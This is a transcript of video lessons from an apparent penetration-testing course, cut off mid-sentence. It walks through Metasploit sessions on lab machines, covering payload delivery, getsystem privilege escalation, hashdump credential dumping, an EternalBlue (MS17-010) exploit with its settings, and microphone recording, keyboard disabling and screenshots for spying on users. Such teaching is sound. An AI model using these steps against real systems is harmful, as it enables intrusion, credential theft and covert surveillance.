security, it's a Chrome security. Just see it's saying the file is dangerous, so Chrome has been blocked it. Okay, now we can able to bypass this one. Okay, but the main challenge for us is to bypass the AV antiviruses. Okay, so this is the thing. Now here you guys can able to see we got the connection after executing the payload. Here we got the connection. Now if I type here get UID, see here it's saying that when it's a normal user right now. Okay, It's a normal user. See, if you type here help, you guys can able to see the commands here. See, from here commands. If you type question tag also, you guys can able to see this results. Okay, like help menu, there is a background, bg, it's a nothing but it's also a background. Okay, bg kill, to kill the background process. Okay, we will learn this all stuffs. Here there is a pivot, uh, there is a UUID is there, get the UUID for the current session. See, pivot is a, it comes under red teaming. Okay, like by scanning the internal network, you just the same process you just need to do here as well. Okay, like hacking the internal systems by using the single targeted PC from this PCC. From this pivoting is a nothing but, see, I just hacked this PC, right? After hacking this PC, by using this PC, we are hacking the other PCs which are in the same network. Okay, by finding some kind of vulnerabilities or something like that. Okay, now here is the thing, there is a print local working directory. The thing is ARP is there, if config is there, the same thing is there. Just see, IP config is there. Okay, see, if config for Linux system, IP config is for Windows system. If you type the if config in the Windows, then you won't see the any kind of output. Okay, at that time, simple, just type the IP config there. This is the thing basically, shell. Now our important thing here is shell. If you type shell here, just see what will happen. You guys can able to interact with CMD. Here you can able to see there is a C user welcome downloads. Remember why it's showing the downloads here. Here you guys can able to see our payload in download folder. So that's why it's showing in download. Okay, this location here. Okay, you guys can also navigate this stuffs. Okay, you no need to worry. But let me tell you, this guy is a normal user. Let me show you. If you type here, just told you, right? If you type here this one, get UID here. Sorry, just type exit from here and just type here get UID. Right now this guy is a normal user. Okay, now let's perform the privilege escalation. See, if you type get system, attempt to elevate your privilege to that of local system. Simple, just copy this command and simple paste it here. It's saying that we can't able to perform the privilege escalation here. Okay, see, operation failed, because the thing is it's not vulnerable. This Windows 7 is not vulnerable, so that's why we can't able to perform this step here, right? Okay, now let me use the hash dump to dump the content from the SAM database. Okay, what is SAM here? In the SAM file, you guys can able in the SAM file there is a username and the passwords out there. Okay, of your system. Let me copy this one. Let me paste it here. Hash dump. See, I can't able to dump the hashes here because the thing is right now I'm not an administrator here. Okay, now simple, let me do one thing. Just exit this. Okay, let's go back here. Let me execute this payload as a run as administrator. Okay, I just executed this payload as a administrator, right? I got the, just type here exploit. Sorry, I just forget it. Okay, I got the shell. If I type here sysinfo, here you guys can able to see, sorry, get UID. Here you guys can able to see win87 the same thing. Just type here help. Okay, and then let me type here something like this, the same thing. Okay, get system. See, got system via technique 1. It's executed. Okay, if I type here get UID, here you guys can able to see NT authority /system. That means whenever you see this NT authority system, that means you are a administrator here. Okay, see, the simple thing is whenever the user executed something here, right? If in this case, what I did simple, I just run as an administrator. This is a manual process. Okay, in this cases, the targets need to execute this executable as an administrator. You guys can also perform the privilege escalation here. I'm gonna teach you that one as well. Okay, you no need to worry how you guys can able to perform the privilege escalation. Okay, right now assume that our target, what is a privilege escalation? Let me tell you that one as well. But let me tell you here what we did. Again, I am saying we did this manually. Okay, run as administrator, right? But we can also perform this by using some vulnerabilities. Okay, by using some tools, by using some scripts, we can able to perform this whole steps by using our Linux system. Okay, by using the MSF console. So you no need to worry about this all stuffs. The simple thing is here again I am saying we did here manually, but in our case in the real world, target won't do this manually, right? He won't execute this exe as an administrator. Okay, this is a thing. At that time we need to perform the privilege escalation. Basically by using this command get system, we can able to perform the privilege escalation here. Okay, because why we can't able to perform this privilege escalation here? Okay, the previous, why we can't able to do that? It showed that like we can't able to perform the privilege escalation here. It shows some error here. Okay, why? Because it's not vulnerable. Again I am saying it's not vulnerable with this one. Okay, so that's why we can't able to perform the privilege escalation by using this get system. If I did this same process in my metasploitable machine, it will happen. Okay, if I type the get system, then it will happen. Okay, I'm gonna show you that one as well. Okay, now this is the thing. Now let me explain you about privilege escalation. What is privilege escalation? See, in the simple scenarios, let me explain you this one. See, there is a document is there. Okay, now the simple thing is I just enable the RDP protocol for this system. Okay, I just provided the see what is RDP. By using this RDP we can able to connect with this system. Okay, like in companies what will happen means by using RDP protocol he can able to connect with this system and he can able to perform his work there. Okay, in some cases what will happen means in companies, assume that I am employee, this is a system. Okay, just let me explain you here. Now this is a company, right? Let me take an example of two employees. Okay, employee 1 and employee 2. Let me give the name like Anil and Sunil, right? There are two guys. Now Anil is a owner of Windows 7. Okay, this system, Windows 7 system. Okay, he's a owner of Windows 7 system. He's a owner. Okay, he's a owner, right? Now Sunil want to interact with this system. Okay, in companies what will happen means sometimes he need to access, assume that let's take an example of like this. Okay, he needs some files, okay, from Anil system. At that time he just contacted with Anil and he just told that he just need to access some systems. Okay, I'm just giving the example. Okay, some system, or he need to do some work in the Anil Windows 7. At that time, to connect with this Windows 7, what Anil gonna do means he enable the RDP, okay, remote desktop protocol, and he provide the username and password to Sunil. Okay, like user and password to Sunil. By using this username and the password, he can able to connect with Windows system. Okay, this Windows 7 system of Anil. Okay, basically again I am saying Anil is a owner of this Windows 7. That means he is a administrator. He's a administrator, and Sunil is a normal user right now. Okay, just take an example like this. Okay, there is a different examples out there, but for a easy way, I'm just using this stuffs. Okay, he's a user here. Okay, he's a administrator. Now, let's go back here. Let me open run here. If you type here app data, this is a app data basically. Okay, see, I can't able to see the app data, right? The app data is accessible only by the administrator, the owner of the system. Okay, assume that any normal user can't able to access that one. Okay, now let me, in this case, I don't want to take the example of app data because it will become complicated. So let me take an example of this text document. Okay, now let me tell you one thing. This text document is a private one. Okay, the Anil don't want to share this text document. Okay, now just simple thing is, see, in Anil system there are some private photos and videos are there. Okay, see, assume that if the this Sunil connected now right now the Sunil is accessing the Windows 7 system, right? He this guy Anil, in Anil system there is some private videos out there or private company data is there. Okay, which is in one specific folder. Okay, now what he gonna do means, like, see, if he just providing the access for the Windows 7 system, his system, okay, to Sunil. At that time he can also access the folder, right, the private folder. At that time what he gonna do means, he will provide the limited privileges to Sunil. Okay, he just provided the limited privileges to Sunil. At that time what will happen is, what is limited privileges? This is the thing. Okay, what is limited privileges? Limited privileges is nothing but he can only access the desktop only. Okay, if anything in the desktop, he can only access that one. Okay, if you want to open the file manager, at that time what will happen means, it will show the pop-up, you are not an administrator, you can't able to access the file manager. Okay, this is a simple thing. He can't able to access the private folder there. Okay, at that time, assume that the Sunil is a hacker. Okay, he can able to perform the privilege escalation there, like by finding some vulnerabilities or something. Okay, he can able to perform the privilege escalation there. By using the privilege escalation, he can able to become the administrator. Okay, right now, see, Anil given the normal user authority to this guy, but this guy, the Sunil, is a hacker. He just, what he did, he performed the privilege escalation. Okay, sorry, privilege escalation, this one. By performing the privilege escalation, he can become the admin. Okay, he by performing the privilege escalation, he can able to access the private folder of the Anil. Okay, this is a thing here. Basically it's a nothing but you are doing the you are becoming the administrator on your target system by finding some vulnerabilities. Okay, this is the thing here. Okay, by using some scripts you guys can able to perform this one. By using manually you can able to perform this stuffs. Okay, right, this is how, this is what privilege escalation means. Okay, sorry, I just forget to explain you this one, why I just created the new text document. Let me tell you the another example of about privilege escalation. Let me tell you, this is just examples. Now in the last example, what I told you, Anil is an administrator and Sunil is a normal user. Okay, he's a normal user. Let me type here something like normal user and administrator. Right, he's admin and Sunil is a normal guy. Now I just told you that he just sent the RDP credentials. Okay, Anil just sent the RDP credentials to Sunil to connect with the Anil Windows system, okay, through RDP. Now the simple thing is, after connecting to Windows system, the Anil Windows system, Anil added some privileges. As I told you, he just added some limited privileges to Sunil. He just provided only limited privileges, such as Sunil can able to access the Windows. Okay, this Windows system. He can also access this new text document. Okay, but he can't able to delete this one. Okay, and he can't able to modify the content. He added the limited privilege. Sunil can able to see this stuffs, okay, but he can't able to delete it or he can't able to modify it. Again, he just added the restrictions such as he can't able to access the. He added the restrictions such as he can't able to open the file manager. Okay. Whenever Sunil click on the file manager, okay, file manager, it won't open. Okay, in our case it's opening, but this is how it's gonna work. Okay, whenever he click on the file manager, it can't able to open. Okay, like whenever he click here, then it will ask for the username and the password and it will show the pop-up. Okay, there are two steps. He can also type the username and the password there, but in some cases what will happen means it will show the pop-up. Okay, like you are not an administrator here. Okay, you can't able to access this folder. If you want to access the folder, simple just yeah, there is a one button like type the username or the password or something like that. Okay, this is a thing here. Basically this is just focus here something like only about this one. Okay, whenever the Sunil click on the file manager, it will show the pop-up something like you are not an administrator, you are a normal user. Okay, you can't able to access this one. He got that pop-up. Okay, that means now Sunil got idea that he just added the Anil added the limited privileges to him. Okay, so simple. Again, I am saying so this guy is a hacker. He performed the privilege escalation here. Okay, this is the thing. Okay, again I am saying privilege escalation is nothing but becoming an admin in this system. Okay, like in the targeted system to bypass the restrictions. Okay, this is a thing. See, there are two steps. You can able to perform the privilege escalations by using scripts, by performing the manual stuffs. Okay, by vulnerabilities. Okay, by doing manual stuffs. Okay, by using the vulnerabilities, by using binaries. Okay, there are a lot of stuffs out there. Okay, but the thing is, the whole thing is nothing but we are bypassing the restrictions here. Okay, we are bypassing what? Restrictions. This is the thing. As I told you, Anil added the restrictions such as I can able to access his systems. Okay, but I can't able to access his file manager. I can't able to delete this document or I can't able to modify this one. Okay, but assume that if there is any kind of vulnerabilities here and I just Sunil can able to perform the privilege escalation, and after performing the privilege escalation he can able to delete this one, he can modify this one because he's an admin there. Okay, this is the thing, right? Hope you guys understand this one. See, if you are not getting this, simple, just type on Google what is privilege escalation. Okay, you will get all the stuff there, right? Hope you guys enjoy these classes. Thank you. Have a nice day. Now let's do this process on our Metasploitable. Okay, I just changed the background here. Right now, see, I'm not running this payload as an administrator. Okay, in the last classes what I did, I just run this as an administrator, but let me run it as a normal user in this class. Okay, just run it. See, if your target, okay, just executed any your malicious payload or file as an administrator, then you no need to perform the privilege escalation. Okay, because he just executed the payload as an administrator, at that time you will get the privileged shell. Okay, at the time you no need to perform the privilege escalation. This is a simple thing. Okay, if the user, if your target is executing this payload as a normal user, basically it's a nothing but it's a normal user. Okay, if you double click this one, then it's a old version, but in new version it won't show like this. Okay, whenever you double click here, the payload will be executed in the background. Okay, that means it's a normal user. Again, I am saying if you are victim, click like this. Okay, like run as an administrator, then the thing will be your payload will be executed as a administrator. At that time you no need to perform the privilege escalation. Again, I am saying this thing. Okay, if I type here exploit, maybe I just need to do it again because I didn't. Okay, let me run it as a normal user. Okay, double click it, run. And here I got the shell. If I type here help, there is a get system is there. Okay, if I copy this and let me paste it here. Now first of all, let me show you sysinfo. Sorry, there is a get UID. Here there is a Vagrant. It's a normal user right now. Basically it's an administrator, I think. See here. Okay, sorry for that. Let me do one thing. Maybe I just log in as a administrator. Let me log off. Simple. Let me type this one. Let me log in as a normal user, Vagrant. Okay, now the password is same, Vagrant. Basically this guy is a normal user. Okay, now let me see there is a payload or not. Okay, the downloads, the payload is not there. Let me open the Chrome. Let me type here my IP address 192.168.133.183. I think the port is 8000. Okay, here there is a normal exe. Let me download this one. See, still it's showing the this one. Okay, dangerous, because we just sending the direct exe here. We can able to bypass this one. Okay, don't worry. It's a, again I am saying it's a Chrome security. Let me keep this one. Okay, show in folder. Okay, in the downloads, let me do one thing first. Okay, let me Control C to stop and just type here exit. Okay, and let me clear this. Now let me Vagrant is a normal user. Okay, he's not an administrator here. Simple. Let me double click this one again. It's showing like this. Let me run this one. Let's go back here and just type here exploit. I just forget it to type this one. Okay, I got the connection. Okay, if I type here sysinfo, this guy is a normal user basically. Okay, just type here get UID. Here you guys can able to see he's a normal user right now. Okay, now let me type here help, and there is a get system user, right? Let me copy this one and let me paste it here. Now see what will happen. I got the right now. Let me do let me type here get UID. Now see here I got the privilege. I just perform what? Privilege escalation. Okay, because this is a vulnerable system, so that's why the command has been successfully executed and I got the privileged the administrator one. Okay, I can able to perform the privilege escalation by just executing this command. Okay, this single command. Now here you guys can able to see an anti-authority system is here. I just told you whenever you got the anti-authority, that means you are an administrator on that system. Okay, now if I type here shell, you guys can able to see system32. That means you are an administrator. This is a second point to check. Okay, now just type here exit. Sorry, here exit, and let me execute the hash dump here. Maybe it will work. Still maybe there is a no passwords, or I don't know why, but it's not executing. Okay, don't worry, I'm gonna show you the another method to dump this all stuffs. Okay, you no need to worry about this all stuffs. Okay, now this is how it's gonna work. Okay, hope you guys understand this things. Okay, because in the last classes I just log in as an administrator. Let me tell you, In this Vagrant, in this Metasploitable, there is two users over there. Okay, basically one is a administrator and one is a Vagrant. Vagrant is a normal user. Okay, if you execute, say, assume that you just log in as an administrator and you just executed the payload in the administrator system. That means your payload will be executed as a administrator only. Okay, it doesn't execute as a normal user because this guy is an administrator here. Okay, so here you guys can able to see, whenever I just perform the thing here, I just executed this as a normal user. Still, I got the anti something like that. Okay, anti authority there. So the thing is, if you want to perform the challenges, then you just need to log in as a Vagrant here. Okay, to learn the PTE, you just need to enter as a Vagrant here. Okay, hope you guys understand this one. Okay, if you are not getting this one, don't worry. Okay, in the next classes we will do this all stuffs practically in the systems, in the real world system, in the Windows 10 or something like that. Okay, right, thank you, have a nice day. In this class you will learn how you guys can able to exploit the eternal blue vulnerability. Now the simple thing is, what is this eternal blue vulnerability? Now let me tell you in a simple word. See, in the last classes what we did, we just sent it the payload to our victim, he just executed it, then we got the reverse shell. Okay, this is the thing. But by you assume that in our target system the eternal blue vulnerability is here. At that time we can able to hack that system by using the IP address. We no need to send any kind of payload or something. Okay, this is the thing. Mostly this vulnerability will present in older version of Windows systems like Windows 7, Windows 8. Okay, now in the real world also you guys can able to see this kind of vulnerability, because the thing is, see, this happens due to our client, sometimes they won't update their systems. Okay, they use the older version. Older versions. Okay, now this let me show you. Just type here eternal blue vulnerability. Here there is a CIS link is there. Just open this and read it. Okay, here you guys can able to see eternal blue is an exploit that allows cyber threat actor to remotely execute arbitrary code and gain access to a network by sending specially crafted packets. It exploits a software vulnerability in Microsoft Windows operating system server message block SMB version 1. Basically it's work with SMB version 1 protocol, a network file sharing protocol that allows access to file and remote server. This exploit potentially allows cyber threat actor to compromise the entire network. See, in the cyber threat actor is a nothing, but you just need to think that this is a attacker. Okay, to attacker can in the normal words, attacker can able to compromise the entire network and all devices connected to it. Okay, due to eternal blue this ability to compromise network, if one device is infected by via eternal blue, every device connected to the network is at risk. Basically this comes under pivoting. Okay, just read this point. Every device connected to the network is at risk, because assume that this thing is vulnerable. Okay, this system is vulnerable. At that time, by using this system I can able to scan the other devices. Okay, yes, in the red teaming training we just covered this all stuffs. Okay, now just see here, this makes recovery difficult as all devices on a network may have been taken offline for remediation. This vulnerability was patched and it's listed on the Microsoft security bulletin as MS17010. Basically this vulnerability is completely patched, but still, okay, but still in internal networks, if there is any kind of older versions out there you guys can able to find this vulnerabilities. Okay, mostly in big organizations. Okay, or a normal there is a big organizations is there, and there is a some organizations which only have the around 300 to 200 systems. Okay, in that organization you guys can able to see this kind of vulnerabilities. Why I'm saying this in a simple words. See, the employees or the company use the older versions of that systems as a server, okay, as an internal server to transfer the files, okay, something like that. They use that the older versions of the systems as a server in their company. Okay, so that's why the server, the older assume that, let me explain you here. I will get this. Okay, now why you have some doubt, right? Like this is a very critical vulnerability, then why you are explaining this? Like this is a completely patched vulnerability, still why I'm trying, why I'm exploiting this one, why I'm trying to show you, why I'm showing you this stuffs there in a simple way. Just see, there is a one company is there. Okay, in company, in large company you guys can able to see the thousands of systems. Okay, in middle, like in a normal company there are, let's take an example of a small organization which have 300 systems. Okay, in 300 systems, just see, uh, sorry guys, assume that in this 300 systems there is a one system is there, just this is example, which having the Windows 7, okay, or Windows 8, which is vulnerable by this eternal blue vulnerability. Okay, eternal blue vulnerability. See why now, why they are using, still why they are using this system in their network. In the simple way is they use this system as a server. Okay, to they host the files in it. Okay, to share, see simple, to access the files. Okay, they use something like that. Okay, like they use this older versions as well. Okay, like as I told you, like a server or to store files. Okay, to transfer files to one system to another systems. Okay, like by just typing the IP address, this system IP address, I can able to access the files, right? In the last classes I just enable the HTTP server there. By using the local IP I can able to access the files, right? I just downloaded in my Windows 7 by in this Windows 7. How I just downloaded that? Simple, by visiting my local my Kali Linux IP address. Simple, they use like that. Okay, to for file transfer or something like that. Okay, but let me tell you, in every company, okay, I am talking about internal server. Okay, in every company there is a outdated systems are there. Okay, you don't think that in companies there are updated or something. Yes, they in the companies there is outdated systems also is there. Okay, like sometimes they are huge. Okay, sometimes they use outdated servers, outdated Microsoft, this Windows servers are there. Okay, by using the, see, this is the work of pen tester. Simple, you just need to visit that company and you just need to audit or perform the vulnerability assessment there, or just perform the penetration testing there. Okay, and you just need to find that vulnerability and you just need to write the report there. Okay, like your this system is outdated and this is a vulnerable by this exploit. Simple, just patch it, or just if you can't able to patch it, simple, they just need to remove this system from the network. Okay, this is the thing. Assume that maybe they can able to patch it. Okay, it's totally depend upon your clients. Okay, but your responsibility is to find to perform the penetration testing there, or vulnerability as it's totally depend upon you. Okay, in the last I'm gonna explain you about what is penetration testing, vulnerability assessment as well. Okay, you no need to worry about this stuffs. Now here the thing is, this is a Windows. Okay, as I told you, in the companies there are outdated Windows are there, but let me tell you again, mostly this things available in internal network. Okay, is available in internal network. Like in a simple words, let me tell you what is internal. Here you guys can able to see one excellent picture about what is internal network and external network. Now just focus here. In internal network there is a server, there is an internal user is here, like you can also say it as a employees. Okay, and here in the external network, the internet. Okay, here you guys can able to see authorized user, unknown user is there. Now just see, authorized user can able to connect with this internal network by using the VPN. Okay, see, unknown user can't able to connect with this internal network. Okay, no connection allowed. Now let me give you one example. See, this is my IP address. Okay, my Linux IP address. Just copy this IP and perform this nmap scan. Okay, just type the nmap and paste this the IP there. Okay, just type this IP. You won't get any results because basically this is an internal network. Okay, if you want to perform the penetration testing on this IP address, then you just need to connect with my network first. Okay, then only you guys can able to perform the nmap scan on this IP address. Okay, this is the thing, right? Simple. The thing what he is saying means, first of all, he need to connect with the internal server. Then only he can able to perform the PT on the internal network. Okay, now see here, just see external network, the internet. Internal network, he didn't mention any kind of internet here. Okay, this is a thing. Basically, to perform these things, it's a local IP, right? We all know this is a local IP, so that's why he doesn't mention the internet here. Okay, internet here, just see. But here he just added the something like VPN. Okay, why he just added the VPN? Let me explain you this one as well. See, the authorized user is not in the internal network. Okay, he's not in internal network, but if you want, if this authorized user want to connect with the internal network of the company, then the company will provide the VPN credentials. By using this VPN credentials, he can able to enter in this internal network. Okay, he can by using this VPN, assume that he just connected with the internal network VPN. Okay, this company VPN. Okay, after connecting with this VPN, he can able to scan this internal networks as well, this internal internal IPs. Okay, this private IPs, he can able to perform the private this penetration testing on this private IP addresses. Okay, now in the easy words, let me explain you. See, sometimes what will happen means, this is a company. Okay, and you just in another location. Okay, the company is in Mumbai and you are in Chennai right now. Okay, now you need to perform the penetration testing on this internal network of the this company. Okay, at that time what will happen means, these guys, okay, will provide you, the company will provide you VPN credentials. By using this VPN, you guys can able to connect with the company network. Okay, like this, in the easy words, you guys can able to connect with the company Wi-Fi network. Okay, then you guys can able to access the internal systems. Okay, like this 192.168. From there you guys can able to perform the penetration testing. Okay, now here there is another guy who is in internet. He doesn't have the VPN credentials. Okay, just tell me, he can able to access this network? No, he can't able to do that. Okay, because it is impossible. How he can able to communicate with this internal IP address of this company? Okay, just tell me one thing. Okay, just open your just open the nmap and scan this IP address. Okay, you won't get any kind of results because this is an internal network. Okay, if you want to perform the penetration on this IP address, then you just need to connect with my Wi-Fi network, right? Again, I am saying this thing. Okay, this is a thing. This is a nothing but this is an internal network. This is a difference between internal and external network. Okay, hope you guys get this stuffs. Okay, if you're not getting this, just try to do the Google search. Now here you guys can able to see Marvel that utilizes eternal blue can self-propagate across network, drastically increasing its impact. For example, WannaCry, a crypto ransomware, was one of the first and most well-known malware to use this exploit to spread. WannaCry uses the eternal blue exploit to spread itself across the network, infecting all devices connected and dropping the crypto ransomware payload that increased the precision and damage that WannaCry could cause in a short amount of time. This increase had made Eternal Blue popular with various malwares such as Trickbot, a modular banking Trojan, as well as coin miner and Vana mine crypto miners that uses to use the eternal blue exploit in order to gain access to computing power to mine cryptocurrencies. Now the simple thing is, see what attacker gonna do here. Simple, he gonna exploit our system. Okay, assume that this system is vulnerable with this WannaCry. Okay, sorry, this eternal blue vulnerability. At that time, what he gonna do? Attacker, simple, he just performs some scanning, or simple he grab my IP addresses. After getting my IP, he gonna exploit it. Okay, I just told you this eternal blue vulnerability, we can able to exploit this vulnerability. Simple, we just need a target IP address, that's it. Okay, this is the thing. Simple, the attacker can able to exploit my system by using the IP address. Okay, yes, this is the thing. After exploiting my system, he gonna inject this kind of WannaCry or crypto ransomware in my system. Then he gonna encrypt my files. Then the attacker gonna ask the money. Okay, something like that. Okay, it's a ransom. Okay, now the simple thing is, what he's trying to say means in this report, mostly at that time attacker inject WannaCry and crypto ransomwares crypto ransomwares on the target systems. Okay, see here, it just there is a point. WannaCry uses the eternal blue exploit to spread itself. Okay, to spread this WannaCry ransomware, WannaCry uses the eternal blue exploit because it is easy for them. Okay, because you no need to send any kind of payload to your target or something. Okay, simple, you just need a IP address of your target network. Okay, simple. After injecting the WannaCry in that target system, automatically it spread itself across the network. Okay, infecting all devices connected and dropping the crypto ransomware. He gonna exploit the systems who are in that network. Okay, just see, infecting all devices connected and dropping the crypto ransomware payload. Just see this point. Okay, this is the thing. Basically, let me show you here. Now you have some doubts, right? Such as how the attacker connected with the internal network of the company or any other guy. I just told you there are two IPs out there. One is private and one is public. Okay, now just see, the attacker uses some steps there, okay, which we covered in the red teaming, but let me explain you. See, this is a external penetration testing. See, in the external penetration testing, what he gonna do means, he just gather the information about the company. Okay, and he just gather the information about the employees as well. Okay, and he just see, by gathering the information, we can able to get the email addresses as well, right? Who are the employee email addresses. Simple, he just sent the email to the employee, the malicious email. Okay, he just opened that email, the employee has been opened the email. Simple, he got the reversal on that system. From that system, he just jump in the internal network. Okay, he can able to do the stuffs there. He can inject the WannaCry. He can do a lot of stuffs there. Okay, but see, there it's showing the three methods here. One is firewall, one is router. See, what is firewall here? Let me tell you, in the public IP. Okay, assume that attacker got the public IP of the company. Okay, he just tried to he just did a huge reconnaissance there, and he got gather some public IP addresses of the company. Okay, simple, he gonna scan that public IP, then he just bypass the firewall, then he just enter in the internal network. Okay, this is the thing basically. Okay, see, you guys can able to perform the penetration testing on the public and private IPs as well. Okay, but in this classes, in this whole training, we are focusing about the private IP addresses. Okay, we are focusing about the internal network penetration testing. Okay, we are not focusing about the external network pen testing. Okay, let me tell you that one as well. Okay, let's exploit the eternal blue vulnerability here. Okay, now the simple thing is, just open the terminal and just type here metasploit msf console dash q. Okay, q is for it doesn't show any kind of output here. Okay, right here it is. Now simple, just search here, search the name of that exploit. Okay, basically we are exploiting it, sorry, eternal blue, right? Here it is. Now simple, you just need to select one exploit from here. Okay, see, in majority of cases which I use is this one. Okay, where it is, uh, exploit Windows SMB MS17010 eternal blue, which is average. Okay, in majority of cases we use this one only, right? Just type here use and type the number here. Okay, the number of this exploit is the ID number. Okay, it's nothing but its ID number, which is 0. Here, see, first of all, let me exploit it. Okay, simple, just type here show options. Here you guys can able to see there is a payload option, module option. In payload option, you just need to set the IP address of your Linux system. Okay, just type here IP config, sorry, if config, and this is my Kali Linux IP address, which is 192.168.133.183. Simple, just type here set lhost, and simple, just type the let me do it for you. Just let me copy it and simple paste it here. Let me set the port to for 4444 only. Okay, now this is very important. Now just see here R port it 44445. Okay, you no need to edit this one. Okay, here there is a R host. Here it will come the our target IP address. Just type here set, sorry, R host. You guys can also type the small characters or capital or small characters. Okay, set R host. R host is my target IP address. Here is my target IP. Okay, my target IP is 192.168.133.187. See, in your case, if the client provide you the public IP, just type the public IP. Okay, see the let me show you first. Just type here 192.168.133.1 what 187, right? Yes. Now just type enter here. See, just type here again show targets. Now in the targets here you guys can able to see it can able to target the Windows 7, Windows Embedded 7. There is a huge systems are there, but our aim is to set automatic target here. Okay, why I am saying automatic? Because we don't know either the system is vulnerable or not. Okay, so that's why what we gonna do means we use the automatic target here. Okay, simple, just type here set target and use the ID is 0. Assume that you know that your target system is Windows 7. Simple, select the Windows 7 embedded standard 7 server 7. If you know the system name, this one, the versions, you guys can able to use it. But in my case, assume that I don't know. Simple, at that time I'm gonna use the automatic target. Just type enter here. Now simple, type exploit. Now see what will happen. First of all, it will scan. Okay, I just told you auxiliary is nothing but in this module you guys can able to see the scanners. Okay, first it will scan that the target is vulnerable with this exploit or not. Okay, you no need to worry. Majority of people will think that how we can able to do this. Simple, you no need to do or you no need to worry. Simple, you just need to use this exploit. Okay, it will do each and everything for you. Okay, you no need to worry here. Simple, just see I got the shell. If I type here sysinfo, here I can able to see there is a Vagrant 2008 R2 server, Windows 2008 R2, and here I can able to hack the system. The simple thing is what I did, I didn't send any kind of payload, I didn't do anything here. Simple, I just grabbed the my target IP and simple, I just hacked that. Okay, this is how the eternal blue vulnerability will work. Okay, if I type here hash dump, hope it will work right now. See, right now I can able to dump the username and the passwords here. Simple, I can able to crack this by using the hashcat. Don't worry, I'm gonna teach you that one. Okay, now this is how this attack gonna work. Okay, again I am saying in this attack, if your target is vulnerable with this eternal blue, then see, first of all, according to me, okay, it's not a live class, right? So that's why maybe majority of people will get this kind of issue. Like how we know that our target is vulnerable or not, okay, with this exploit. At that time, again I am saying this thing, you no need to worry. Either you guys can also use the nmap scan, but I don't prefer, okay, because it will take some time. Simple, the thing is, in my case, what I do means I use this one, okay, this module. Okay, let me show you how you guys can able to perform the nmap scan as well. Okay, simple, by I just told you the vulnerability script, right? Nmap dash dash script. Here you just need to type the just use the vuln there. Okay, simple, it will show the output, or you guys can also use the smb. Okay, because this attack is vulnerable to smb. Okay, so the simple thing is, so that's why I didn't tell you about the nmap, because maybe majority of people will get some kind of confusions here. So that's why I didn't tell you about the nmap. Okay, if you know the basics about nmap, or you know ethical hacking, then you will get this stuffs. Okay, this is the thing. Okay, now let me execute this attack. Okay, simple, you just, again I am saying, instead of this one, you guys no need to add the smb. If you are getting some kind of confusion here, then you no need to add the smb. Simple, just type here script is equal vuln. Okay, that's it. It will do each and every work for you. Okay, see, my aim is to teach you in a easy process. Okay, like you no need to worry, you no need to worry a lot here. Okay, here you guys can able to see there is a this one. Okay, the 445 is vulnerable with which one? Remote code execution vulnerability in Microsoft SMB v1 server. Okay, and it's a state, just see the state is vulnerable. Okay, this is the thing. This is how you guys can able to find the it's vulnerable or not, but I don't prefer this one because this guy, these exploits do the whole work for me. Okay, see, it gonna scan it, then it gonna tell us it's a vulnerable or not. Okay, host is likely vulnerable. If the host is likely vulnerable, then it gonna start the attack here. See, the target is vulnerable. See, it just given me the flag here, connecting to the target for exploitation, then establishing for the exploitation, then I got the meter shell here. Okay, this is how the things gonna work here, right? Hope you guys enjoy these classes. Thank you, have a nice day. Now again the last thing is, you no need to worry about external and internal pen testing. I just forget this thing. Okay, you don't need to worry. See, if your target if your client is providing the public IP or subdomain or domain, then it is known as a external pen testing. Okay, like okay, this is known as a again I am saying, if your client providing you the public IP, okay, or subdomain or domain, then it comes under what? It comes under external pen testing. And the second thing is, if you are not visiting to that company and and your client is not providing any kind of credentials to you, basically it comes under black box pen testing. Okay, yes, means the client doesn't provide you a lot of stuff. Simple, he gonna provide you the IP address or domain. Okay, from there you just need to perform the PT. Okay, what is internal pen testing? Simple, you just enter in one organization and you just connected with that Wi-Fi network of that organization, then you are just performing the scanning there. This comes under what? Internal PT. So you no need to worry. Okay, in the last classes, according to me, majority of people will get some kind of confusions, right? So simple, you no need to worry. If you are visiting to company or the company provided the VPN credentials, that means it's a nothing but it's an internal PT. If your client is providing the public IP or domain or something, and you didn't connect it with the company network, okay, that means it's a external PT. Okay, you no need to worry here. Okay, right. Hope you guys understand this all stuff. Thank you. Have a nice day. Now in the last class, what I did, I just targeted the metasploitable machine. Okay, now in this class, let me target the Windows 7, the same process by using the eternal blue vulnerability. Okay, now here just see, I just use the same thing and I just exploited this machine. Okay, see the IPv4 is 192.168.133.185. Okay, right. See, now the simple thing is, let's learn some more about this commands. Okay, the important stuffs. Now here we sorry guys, we all know that by using get system we can able to perform privilege escalation. Just if I type here paste, then already running as a system. Okay, no problem. Whenever you send any kind of payload or something, what will happen means, sometimes sorry, if you are targeting the Windows 10 or something like that, at that time what will happen means this won't work. Okay, at that time you just need to use a different method. I'm gonna cover that one too. Okay, now the simple thing is, there is a hash dump. If I copy this one, in the last classes I showed you, right, you guys can able to dump the hashes. Okay, basically what is this hashes, you know, right? In the one system there are different users out there. Okay, like administrator with the name of Alex, John or something like that. Okay, you guys can able to dump the username and the password of different users and you guys can able to log in as them. Okay, now here there is a hash dump get system play. Sorry guys, it's not much important for us, but according to me this is a very important thing. Record mic. See why I am saying, assume that there is a, you just hacked one system, one company system, then what will happen? Assume you let's take an example of an attacker. Okay, assume that one attacker hacked your company system. Okay, after hacking that system, what he did means he started this command there. Okay, record mic, and he added some seconds. Okay, you just need to calculate the, you just need to mention the seconds. 60 seconds means what? It's a 1 minute. Okay, so this is how this gonna work. Okay, like you just need to add like this, record mic space, and you just need to provide 120. That means you are recording for 2 minutes. So this is how you just need to increase the number there. Okay, now here the thing is, what will happen means, assume that you just hacked one company system. Okay, and you just started this feature there on that target system. See, there are two employees are talking about some private stuffs about the company. Okay, then what will happen, the attacker can able to listen this stuffs, right? So this is a thing here, and there is a UICTL is there. It's a nothing but control some of the user interface components, such as you guys can able to disable or enable the USB connected device. Okay, like assume that the keyboard and mouse or any kind of uh, the devices which are connected through USB. Okay, you guys can able to do that stuffs. Okay, simple, to do that, simple, just type here UT sorry guys, UICTL, and just type here something like this. Okay, disable keyboard. Then what will happen means the keyboard will be disabled on your target system. Okay, it's not working right now because it's a virtual machine. In virtual machine, uh, you guys can able to see, right? It's a virtual machine. I can't able to do the stuffs. Okay, in the real world it will work, right? And there is the same thing for if you want to enable the stuffs, simple, just remove the disable and enable the things there. Okay, right. Okay, it's not working, leave it. And there is a set desktop is there, change the interpreter current desktop is there. It's not that much. And here is a screenshot, you guys can able to take the screenshot of your target system. Just type screenshot here. See, it's saved here, home Kali. Here maybe home here there is a screenshot. Okay, not this one. Okay, this one. Now assume 